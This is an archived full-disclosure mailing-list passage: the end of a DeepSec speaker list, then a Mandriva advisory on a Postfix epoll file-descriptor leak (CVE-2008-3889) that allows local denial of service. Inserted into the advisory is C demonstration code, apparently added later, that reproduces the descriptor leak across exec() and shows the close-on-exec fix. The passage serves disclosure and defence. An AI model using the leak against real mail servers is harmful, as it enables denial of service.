* Daniel Mende, Simon Rich ; ERNW GmbH ; Germany
* Dr. Anton Chuvakin ; LogLogic, Inc ; USA
* Haroon Meer ; SensePost ; South Africa
* Heikki Kortti and Jukka Taimisto ; Codenomicon Ltd ; Finland
Jason Steer ; IronPort, a division of Cisco Systems ; UK ? Joe Stewart ; SecureWorks ; USA ? Jos? Nazario ; Arbor Networks ; USA ? Kurt Grutzmacher ; Pacific Gas & Electric ; USA ? Luciano Bello ; CITEFA/Si6 , Debian Project ; Argentina ? Marc Schoenefeld ; University of Bamberg ; Germany ? Matt Jonkman ; Emerging Threats.net (formerly bleedingthreats.net) ; USA ? Morgan Marquis-Boire ; Security-Assessment.com ; New Zealand ? Neelay S. Shah ; Foundstone Inc., A Division of McAfee ; USA ? Paolo Perego ; Spike Reply srl, Owasp Orizon Project leader ; Italy ? Peter Panholzer ; SEC Consult Unternehmensberatung GmbH ; Austria ? Rafael Dominguez Vega ; MWR InfoSecurity ; UK ? Saumil Udayan Shah ; CEO, Net-Square ; India ? Scott Lambert, Jason Geffner ; Microsoft, NGSSoftware Ltd. ; USA ? Sharon Conheady ; Ernst & Young ; UK ? Shreeraj Shah ; Blueinfy Solutions ; India ? Simon Roses Femerling ; Microsoft ; Spain ? Stefan Schumacher ; Kaishakunin.com ; Germany ? Stefano Zanero ; Politecnico di Milano TU ? Claudio Criscione ; SecureNetwork Srl ; Italy ? VimalPatel ; Founder & Director, Blueinfy Solutions Pvt. Ltd. ; India ? Vincenzo Iozzo ; Secure Network ; Italy ? Yarochkin Fedor/Meder Kydyraliev ; guard-info ; Kyrgyzstan ? Yiannis Pavlosoglou ; Ounce Labs / PhD, OWASP Project Leader ; United Kingdom ? fukami ; SektionEins GmbH ; Germany DeepSec Organisation Team. 
https://deepsec.net/contact

From security at mandriva.com Wed Sep 10 19:51:01 2008
From: security at mandriva.com (security at mandriva.com)
Date: Wed, 10 Sep 2008 12:51:01 -0600
Subject: [Full-disclosure] [ MDVSA-2008:190 ] postfix
Message-ID: <E1KdUmL-0001hh-9r@titan.mandriva.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDVSA-2008:190
http://www.mandriva.com/security/
_______________________________________________________________________

Package : postfix
Date : September 10, 2008
Affected: 2008.0, 2008.1
_______________________________________________________________________

Problem Description:

A vulnerability in Postfix 2.4 and later was discovered, when running on Linux kernel 2.6, where a local user could cause a denial of service due to Postfix leaking the epoll file descriptor when executing non-Postfix commands (CVE-2008-3889).

The updated packages have been patched to correct this issue.
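As an added illustration of the bug class behind this advisory (constructed example, not Postfix code), the C program below shows how a descriptor created without FD_CLOEXEC, here an epoll fd from the legacy epoll_create() call, is inherited by any command the process exec()s, and how setting close-on-exec stops that. It assumes Linux and /bin/sh; the child shell stands in for the "non-Postfix command" of the advisory.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <sys/epoll.h>
#include <sys/wait.h>
#include <unistd.h>

/* 1 if fd is still open inside a freshly exec()ed /bin/sh, 0 if it was closed on
 * exec, -1 on error: the child dups fd onto stdin, which fails (EBADF) if closed. */
int fd_survives_exec(int fd)
{
    char cmd[64];
    snprintf(cmd, sizeof cmd, ": 2>/dev/null <&%d", fd);
    pid_t pid = fork();
    if (pid == 0) {                 /* child: becomes the "non-Postfix command" */
        execl("/bin/sh", "sh", "-c", cmd, (char *)NULL);
        _exit(127);
    }
    int status;
    if (pid < 0 || waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
}

/* Audit check: 1 if fd would leak into exec()ed commands (FD_CLOEXEC unset). */
int fd_leaks_on_exec(int fd)
{
    int flags = fcntl(fd, F_GETFD);
    return flags < 0 ? -1 : !(flags & FD_CLOEXEC);
}

/* Mitigation: mark the descriptor close-on-exec so children never see it. */
int set_cloexec(int fd)
{
    int flags = fcntl(fd, F_GETFD);
    return flags < 0 ? -1 : fcntl(fd, F_SETFD, flags | FD_CLOEXEC);
}

/* Whole scenario: legacy epoll_create() gives a descriptor without close-on-exec,
 * so a child command inherits it; after set_cloexec() it does not. 1 if both hold. */
int demo_epoll_leak(void)
{
    int ep = epoll_create(1);
    if (ep < 0) return -1;
    int before = fd_leaks_on_exec(ep) == 1 && fd_survives_exec(ep) == 1;
    set_cloexec(ep);
    int after = fd_leaks_on_exec(ep) == 0 && fd_survives_exec(ep) == 0;
    close(ep);
    return before && after;
}
```

On kernels that provide it, epoll_create1(EPOLL_CLOEXEC) creates the descriptor already hardened, avoiding the window between creation and fcntl().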
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3889
http://www.postfix.org/announcements/20080902.html
_______________________________________________________________________

Updated Packages: